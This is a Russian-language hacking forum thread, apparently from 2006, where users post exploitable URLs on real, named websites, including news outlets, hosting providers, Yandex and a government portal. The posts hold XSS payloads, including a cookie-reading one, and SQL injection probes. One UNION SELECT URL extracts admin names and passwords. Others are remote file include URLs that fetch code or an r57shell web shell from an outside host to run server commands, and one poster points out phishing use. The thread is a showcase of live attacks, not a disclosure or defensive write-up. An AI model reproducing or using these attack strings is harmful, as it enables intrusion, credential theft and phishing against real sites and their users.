|
Баги на сайтах.
Очень часто создаются темы типа: Нашел XSS, Нашёл SQL injection. Уже немного надоело. Предлагаю всем найденные вами баги (если вам не терпится показать этот баг всем) постить в эту тему, чтобы не засорять форум!
UPD: никаких рефереров! все линки даем исключительно так _http:// |
http://www.generis.ru/?page=press_wholenews&id='
http://www.integracija.gov.lv/forum/?setc=1&forumid=' http://www.mossei.ru/?page=' Вот для начала |
Идея хорошая принципы .
_www.pansionmsu.ru , в строке поиска <script>alert()<script> _http://msu.ru/ , в строке поиска , <script>alert()<script> не вышел , а <marquee>msu</marquee> выходит . _http://online.ua/ Строка поиска , <marquee>UA</marquee> , <img src="http://www.online.ua/all/0.gif"> покажет свой собственный логотип который в верхнем левом углу . |
_http://referat.star-info.ru
В поиске если написать <i>i</i> то будет так Warning: eregi_replace(): REG_EMPTY in /usr/home/www/user/referat.star-info.ru/inc/func on line 73 |
www.supersait.net.ru/billing/config.php?_CCFG[_PKG_PATH_DBSE]=http://qwe20063.narod.ru/&cmd=id
сам сайт supersait.net.ru нечего из себя не представляет, зато он хостится на очень известном хостинге, до которого можно добраться используя багу в phpcoin. Тоесть благодаря php include мы можем выполнять никсовые комманды (ls;pwd;echo;cat) на сервере. |
_http://vidahl.agava.ru/cgi-bin/dic.cgi?search=%3Ci%3Ei%3C%2Fi%3E&method=exact
В графе поиск статьи <script>alert()</script> |
Справочник телефонов города Орла
http://www.g-play.ru/orel/ "Поиск организаций по названию, виду деятельности:" В поиске <script>alert()</script> |
Еще .
1) url : _http://prohosting.fatpickle.com/search <script>alert()</script> в поиске . 2) Url: _http://www.babr.ru/index.php?pt=pages <script>alert()</script> в поиске . 3) url : _http://www.ambercity.ru/ <script>alert()</script> в поиске . |
1)
Url :_http://www.cityvision2000.com Можно узнать путь установки . В поиске <script>alert()</script> "D:\Webs\city\www\search.cgi": No such file or directory 2) url: _http://www.pages.ru/ Поиск <script>alert()</script> |
_http://zna.nu/vg_eng.php?id='
Интересный сайт :) |
Url : _http://xss.mask.ru/
В поиске <script>alert()</script> |
Url : _http://www.miit.net
<script>alert()</script> В поиске |
XSS-уязвимости
1. _http://www.ruslink.de/cgi-bin/search.pl XSS1 - "<script>alert()</script>" в строчке поиска. 2. _http://links.keraben.ru/search.php XSS2 - "<script>alert()</script>" в строчке поиска. 3. _http://www.send.ru/search/index.html XSS3 - "<script>alert()</script>" в строчке поиска. 4. _http://coda.net.ru/index.php XSS4 - "<script>alert()</script>" в строчке поиска. 5. _http://www.zlinks.ru/search.php XSS5 - "<script>alert()</script>" в строчке поиска. |
Цитата:
|
http://icq.rambler.ru/popup.html?ipath=<script>alert()</script>
=) Люблю Аську. |
_http://www.nne.ru/news.php?id=1429'<script>alert(/nexwill/)</script> Гы ))))) :D :D
|
На __http://www.nne.ru Xss еще в поиске .
|
_http://www.flirtshop.ru/search.xhtml?sea_text=%3Cscript%3Ealert%28%22Vanda l%22%29%3C%2Fscript%3E&-action.search=1
|
|
xss..
1. _http://www.infopiter.ru/cgi-bin/catalog/catalog.cgi?action=search&fil=1&Keywords=%3Cscript %3Ealert%28%29%3C%2Fscript%3E&poisk=word 2. _http://list.emy.ru/search.php?keyword=%3Cscript%3Ealert%28%29%3C%2Fsc ript%3E&opt=0&x=26&y=9 3. _http://www.fromatoz.ru/catalog/search/?searchQuery=%3Cscript%3Ealert%28%29%3C%2Fscript%3 E 4. _http://links.vestor-ru.ru/0.html?s=%3Cscript%3Ealert%28%29%3C%2Fscript%3E 5. _http://catalog.a-les.ru/index.php?ac=search / в поиске <script>alert()</script> |
_http://avtoprice.com/cgi-bin/search.pl
Поиск : <script>alert()</script> _http://www.autobriz.ru/cgi-bin/catalog-find.pl?CMD=FIND&WORDS=%3Cscript%3Ealert%28%29%3C% 2Fscript%3E |
Вот ловите
http://www.hithost.ru/cgi-bin/game_1_10.cgi?sid=5668431270%22%3E%3Cscript%3Ealer t(document.cookie)%3C/script%3E%3Cb%20src=%22 может тому кто сайт расскручивает и пригодиться, d1mon - это тебе )) ггг.. |
XSS
Поисковая система KM.RU _http://go.km.ru/index.asp?idr=0&ids=&wdv=0&mrv=1&dti=0&dtv=3&idt=& ann=1&srt=0&itp=-1&osq=&P1=&P2=&P3=&ext=0&opt=0&hlp=0&sr=0&sq=%3Csc ript%3Ealert%28%29%3C%2Fscript%3E РИА Новости _http://www.rian.ru/search/?query=%22%3Esa%3Cscript%3Ealert%28%29%3C%2Fscript %3E&x=8&y=1 Lenta.ru _lenta.ru в поиске: "><script>alert ()</script> ГАЗПРОМ.ру _http://www.gazprom.ru/cgi-bin/htsearch - в поиске: "><script>alert ()</script> Болеро.ру _http://www.bolero.ru в поиске: "><script>alert ()</script> CyberFight.ru _http://cyberfight.ru/info/search/?qry=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E& mode=simple kino.ru _http://www.kino.ru/search.php - в поиске: <script>alert ()</script> РБК _http://av.rbc.ru/?query=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&type =&morph=on&cat=&d1=13&m1=02&y1=2006&d2=13&m2=03&y2 =2006&howmany=10&sort=date |
XSS
Сайт Правительства России (government.ru) _http://www.government.ru - в поиске: "><script>alert ()</script> Rambler: Фото _http://foto.rambler.ru - в поиске: "><script>alert ()</script> Правда.ру _http://pravda.ru - в поиске: "><script>alert ()</script> Referat.com _http://links.referat.com/?hp=0&st=%3Cscript%3Ealert+%28%29%3C%2Fscript%3E RuPay.ru _http://rupay.ru - /подписка на новости/ - /ваш email/ - вписываем туда: "><script>alert ()</script> Ren-TV.com _http://ren-tv.com - /поиск/ - "><script>alert ()</script> |
VolkIncor
1)http://www.strelna.org.ru/main.php?p...u/r57shell.txt
2)http://sync.te.ua/index.php?page=htt...u/r57shell.txt :eek: :eek: :eek: :confused: :confused: :confused: |
|
_http://kinoshara.com/search.php?search=%3Cscript%3Ealert%28%29%3C%2Fscr ipt%3E
|
h16.ru
http://register.h16.ru/cgi-bin/sp.cgi?fqdn=%3Cscript%3Ealert()%3C/script%3E |
XSS
прошелся по хостингам Netco _http://www.netco.ru - Зарегистрировать домен -> <script>alert ()</script> Standarthost _http://www.standarthost.ru - Проверка домена -> <script>alert ()</script> [.m]masterhost _http://masterhost.ru - Проверить домен -> "><script>alert ()</script> Terrahost _http://www.terrahost.ru/whois/whois.php?domain=%22%3E%3Cscript%3Ealert+%28%29%3C %2Fscript%3E&ru=on MASTAK _http://www.mastak.ru/Mwois/mwhois.php?domain=<script>alert%20()</script> |
|
Уже посерьезнее, эту можно использовать для фишинга...
Как и предыдущую... Остальные бесполезны практически... |
_http://kaiser.su/index.html?form='
_http://saratov.cityout.ru/search/?fastsearch=%3Cscript%3Ealert%28%29%3C%2Fscript%3E &cat=0 Links |
|
Цитата:
Код:
http://kaiser.su/index.html?form=index&href=223344&class=-5%20union%20select%201,concat(name,':',password),3,4,5,6,7,8,9,10,11%20from%20admin/* |
_http://mail.goon.ru/reg/agreement.phtml?r1=103'&t1=%5C%22%5C%272&i=
|
http://wahack.org.ru/?sec=lib&ver=html&p=0&text=2'
|
http://www.gamershell.com/pc/gti_racing/screenshots.html?id=<script>alert()</script>
|
31.03.2006 20:11
Цитата:
|
багу нашёл около 3х недель назад
говорили с киборгом в мирке на счёт этого дела, итог: бага ниче не даёт... но всё равно интересная реализация: http://afisha.yandex.ru/event.xml%00 http://money.yandex.ru/shops.xml%00 и так во многих xml яндекса, но не во всех... |
На http://ha.ckers.org/xss.html если ввести в поле:
HTML (with semicolons): текст %Wd то выскакивает алерт, правда не понял почему и какая от этого польза. |
| Время: 04:46 |